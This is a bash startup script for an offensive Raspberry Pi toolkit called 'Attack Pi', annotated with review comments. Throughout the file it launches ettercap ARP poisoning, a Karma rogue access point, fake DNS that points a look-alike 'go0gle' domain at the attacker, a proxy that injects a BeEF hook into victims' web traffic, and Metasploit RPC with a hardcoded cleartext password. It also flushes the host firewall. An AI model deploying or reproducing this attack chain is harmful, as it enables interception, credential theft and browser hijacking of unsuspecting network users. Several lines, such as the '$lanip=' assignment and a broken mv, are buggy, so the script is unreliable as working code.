#!/bin/bash
# start.sh -- interactive startup script for "Attack Pi".
#
# Flow: verify root, prompt for three interface names and an operating
# mode, then (for modes 2 and 3) rewrite the host's iptables/NAT rules,
# reconfigure the LAN interface, install config files under /etc and
# launch each service in its own tmux window.
#
# Operator notes (from reading the code, not from any config):
#   - Nothing below is restored on exit: existing iptables rules are
#     flushed, ip_forward is left enabled, and /etc/hostapd.conf and
#     /etc/udhcpd.conf are overwritten without a backup.
#   - Every input is read with a bare `read` (no -r, no validation) and is
#     expanded unquoted into ifconfig/iptables commands further down.
#   - All paths (bin/, conf/) are relative, so the script is expected to
#     be run from the repository root.
echo "=========================="
echo "WELCOME TO ATTACK PI ALPHA"
echo "=========================="
echo ""
# Root is required for iptables, ifconfig, /proc/sys and writes under /etc.
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root" 1>&2
exit 1
fi
echo "This startup process will take some time -- Metasploit and beef load slowly."
echo "What is the name of your internet interface?"
#TODO : Verify this interface actually exists
read internet
echo "What is the name of your LAN interface?"
#TODO: Verify this interface actually exists
read lan
echo "What is the name of your secondary WLAN interface?"
echo "(This interface will be used for 802.11 attacks+sniffing)"
# NOTE(review): $secondlan is read here but never referenced again in this file.
read secondlan
echo "=========================="
echo "+ CHOOSE ATTACK MODE +"
echo "=========================="
echo ""
echo "1. Limpet Mine : Attach to network, attack with ARP Poison Ettercap and Easycreds"
echo "2. Passive Mode : Free Wifi, options for landing page attacks, passthru, ect..."
echo "3. Aggro Mode : Seek and destroy wireless network clients. Creates rouge AP"
read mode
# Mode 1 runs to completion inside its case arm and exits; modes 2 and 3
# only select a hostapd config here and fall through to the shared setup
# below. $mode is expanded unquoted; an empty or multi-word answer lands
# in the "*)" arm.
case $mode in
1)
#limpet
#Start ettercap in man-in-the-middle ONLY mode, specifically arp poisioning
#NOTE: I kinda doubt that the Raspi is going to win any DHCP races under load, so I'm not including it right now
#TODO: Include DHCP poisoning
# Runs in the foreground; the iptables lines below only execute after
# ettercap returns.
ettercap -T -o -M arp:remote // //
#MITM IP tables redirect.
#Redirects the HTTP port to our python proxy which injects the BEEF hook.js
#Pretty sure we already do this
# Flushes every existing rule and chain, including any host firewall
# that was in place before the script ran.
iptables -F
iptables -X
iptables --table nat --flush
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
# Exits with ettercap's/iptables' last status; the tmux/AP setup below is
# never reached in this mode.
exit
;;
2)
#freewifi
# Path is relative to conf/ -- it is joined as conf/$conffile below.
conffile='../conf/freewifi.conf'
;;
3)
#balls-out attack mode
# Resolves to conf/../hostapd.conf, i.e. hostapd.conf in the repo root.
conffile='../hostapd.conf'
;;
*)
echo "Invalid mode selection."
#Todo: Make this recover from a bad mode select
# Exits 0 despite the bad selection.
exit
;;
esac
#============================================================================================#
#prep the interface for wireless operations.
# Kill network managers/clients by name (presumably so they don't reclaim
# the interface); killall returns non-zero when nothing matches, which is
# ignored here.
killall wicd
killall dhclient
killall wpa_supplicant
killall wpa_cli
killall ifplugd
ifconfig $lan down
#setup IPTables -- no firewall, just NAT
# As in mode 1: all pre-existing filter and nat rules are discarded first.
iptables -F
iptables -X
iptables --table nat --flush
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
# Accept everything on the LAN interface in both directions.
iptables -A INPUT -i $lan -j ACCEPT
iptables -A OUTPUT -o $lan -j ACCEPT
# Forwarding: this rule names wlan0 literally rather than $lan.
iptables -A FORWARD -i $internet -o wlan0 -j ACCEPT
iptables -A FORWARD -i $lan -o $internet -j ACCEPT
iptables -A POSTROUTING -t nat -o $internet -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
# Port 80 from the LAN is DNATed to the proxy at 10.1.1.1:8080 (10.1.1.1 is
# the address assigned to $lan in the AP configuration below).
iptables -t nat -A PREROUTING -i $lan -p tcp --dport 80 -j DNAT --to-destination 10.1.1.1:8080
#TODO: Fix proxy bugs for HTTPS connections -- Currently they pass through
#iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j DNAT --to-destination 10.1.1.1:8080
#warn user
echo "This will take some time. Get a coffee..."
#start TMUX
#TODO: Give this optional keybindings for screen or tmux-style byobu if possible
# Detached session "Attack"; each service below gets its own numbered window.
tmux start-server
tmux new-session -d -s Attack -n AttackPi
#TODO: there may be a bug here stopping hostapd from working properly, probably because of this stuff below. I rearranged the order.
#AP Configuration
ifconfig $lan down
# Fixed locally-administered MAC (02: prefix) on the LAN interface.
ifconfig $lan hw ether 02:ab:cd:ef:12:30
# might be having issues with this....
ifconfig $lan 10.1.1.1 netmask 255.255.255.0
# Prepend an interface= line to the selected config and install it as
# /etc/hostapd.conf; the previous system file is overwritten.
echo "interface=$lan"|cat - conf/$conffile > /tmp/out && mv /tmp/out /etc/hostapd.conf
#KARMA
killall hostapd-karma
# Window 5: hostapd-karma with the -dd flags, reading the file written above.
tmux new-window -tAttack:5 -n 'HostAPD' 'bin/hostapd-karma -dd /etc/hostapd.conf'
echo "Started Karma Hostapd"
#DHCP
# Same prepend-and-install pattern for udhcpd; overwrites /etc/udhcpd.conf.
echo "interface $lan"|cat - conf/udhcpd.conf > /tmp/out && mv -f /tmp/out /etc/udhcpd.conf
killall udhcpd
# Window 6: udhcpd in the foreground (-f).
tmux new-window -tAttack:6 -n 'dhcp' 'udhcpd -f /etc/udhcpd.conf'
#DNS
killall fakedns.py
#write configuration file for the default beef hook
#I used go0gle.com and give it the ip address assigned to the lan interface
# This is dynamic because i hope to set these values via a configuration file
# in the future revisions of this project
# Meant to capture the LAN address reported by bin/get_ip.py for the DNS
# entry below.
$lanip=`bin/get_ip.py $lan`
# TODO: Configuration file sets beef hook name
echo "go0gle.* $lanip"|cat - conf/dns.conf > /tmp/out && mv -f conf/dns.current
# Window 7: fakedns, started from bin/ so the conf path is relative to it.
cd bin/
tmux new-window -tAttack:7 -n 'dns' 'fakedns.py ../conf/dns.current'
cd ../
#PROXY
killall proxy.py
# Also requested as window 7 (same index as the dns window above).
tmux new-window -tAttack:7 -n 'Proxy' 'bin/proxy/proxpy.py -x bin/proxy/plugins/inject.py'
###########CANT ENABLE RELIABLY WITHOUT A 512MB PI################################
#MSRPC Service
killall msfconsole
# TODO: The MSFRPC password is hardcoded as pi/raspberry. This probably won't be suitable for advanced ass-hattery
# The credential is stored in clear text in the two files listed below and
# is echoed to the terminal here; it is not read from the environment.
echo "WARNING: THE MSFRPC PASSWORD IS 'raspberry' YOU HAVE TO CHANGE IT ON YOUR OWN IN THE SCRIPTS"
# locations bin/msf/scripts/beef/beef.rc, bin/beef/extensions/metasploit/config.yaml
# Window 8: msfconsole running the beef resource script.
tmux new-window -tAttack:8 -n 'MSF' 'bin/msf/msfconsole -r bin/msf/scripts/beef/beef.rc'
#sleep because we don't want beef to load before metasploit does
# Fixed two-minute wait; there is no readiness check on msfconsole.
sleep 2m
########################################################################################
#Beef
killall beef
#beef hates being started from anywhere other than it's home folder.
# Window 9: beef, launched from its own directory.
cd bin/beef
tmux new-window -tAttack:9 -n 'BEEF' './beef'
cd ../../
#done
# Attaches the terminal to the session; the final echo only prints after
# the user detaches.
tmux attach -t Attack
#tmux select-window -tAttack:0
#byobu
echo "Services have started -- you may need to wait for beef."